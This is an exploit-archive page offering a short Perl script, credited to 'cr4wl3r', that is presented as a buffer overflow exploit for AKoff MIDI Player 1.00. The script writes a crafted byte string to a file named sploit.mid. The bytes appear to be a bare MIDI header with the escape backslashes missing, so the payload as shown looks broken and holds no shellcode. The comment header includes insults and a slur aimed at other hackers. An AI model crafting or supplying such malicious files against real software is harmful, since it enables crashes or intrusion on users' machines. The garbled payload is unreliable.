[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AKoff MIDI Player v1.00 Buffer Overflow Exploit
# Published : 2010-03-04
# Author : cr4wl3r
# Previous Title : Flare <= 0.6 Local Heap Overflow DoS
# Next Title : WinSmMuPl 1.2.5 (.mp3) Local Crash PoC


#!/usr/bin/perl

# AKoff MIDI Player 1.00 Buffer Overflow Exploit
# By cr4wl3r <cr4wl3rx40linuxmailx2Eorg>
# gr33tz: str0ke, opt!x hacker, xoron, EA ngel, zvtral, Hmei7, mywisdom, cyberlog, irvian, and all my friend
# thanks: milw0rm, darkc0de, exploit-db, inj3ct0r, manadocoding, sekuritionline
# Fuck to buat loe tukang show off, dan buat loe yang mengaku dirinya hacker dan pamer sana-sini
# mengatakan orang lain lamer karena suka deface sedangkan dirinya adalah tukang deface
# you are 1337 lamer 1337 hoax and 1337 gay
# i'm injector and rooter in the site and i'm be silent

#`````````` ___ ____ ____
#````______/```__//```__/____
#``_/```_/``:```````````//____
#`/|``````:``:``..``````/````````    W A R N I N G !!! REMEMBER ME
#|`|`````::`````::``````````````/
#|`|`````:|`````||``````______/
#|`|`````||`````||``````|``/``|
#`|`````||`````||``````|```/`|`
#``|`````||`````||``````|``/`/_`
#``|`___`||`___`||``````|`/``/````
#```_-_/``_-_/`|`____`|/__/``````
#````````````````__--_/`````````/
#```````````````/____```````````/
#``````````````/``````````````/
#``````````````_____________/


$buff = "x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00";
###################################################################
open(file, "> sploit.mid");
print (file $buff);
###################################################################